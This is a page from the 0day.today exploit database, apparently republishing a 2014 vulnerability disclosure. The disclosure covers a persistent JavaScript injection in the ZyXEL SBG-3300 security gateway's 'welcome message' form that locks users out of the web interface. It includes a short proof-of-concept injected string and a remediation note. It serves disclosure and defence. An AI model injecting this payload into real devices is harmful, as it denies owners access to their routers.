0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZyXEL SBG-3300 Security Gateway Denial Of Service Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
######################################## #Vulnerability Title: DoS in ZyXEL SBG-3300 Security Gateway #Date: 02/10/2014 #CVE-ID: CVE-2014-7278 #Product: ZyXEL SBG3300-N series #Vendor: www.zyxel.com #Affected Firmware: Latest version at the time of disclosure V1.00(AADY.4)C0 and below (tested) #Patch: Unpatched #Authored by: Mirko Casadei ######################################## #Disclosure Timeline: 13/08/2014 Vendor Contact with Acknowledgment 13/09/2014 No response from Vendor after first contact 02/10/2014 Full Disclosure #Technical details: Abusing the 'welcome message' form, an attacker can inject JavaScript code into a core function of the main login page. The persistent javascript code injection in the framLoad() function bypass all the security checks and cause a Denial of Service disabling any access to the router web interface. Access is restored with a new firmware installation. Example of a working code: //////// !WARNING! TEST AT YOUR OWN RISK /////// var loginMsg loads input from the 'welcome message form' ... function framLoad () { var status = '0'; var count = ''; var Retry = ''; var period = ''; var loginMsg = '<DoS="javascript:alert('DoS coming!')">'; var LockTime; var waitTime; if ( advancedaccountsecurity == '0' ) { loginrandom = '0'; } ... #Remediation The vulnerable form should sanitize input. ######################################## # 0day.today [2024-11-15] #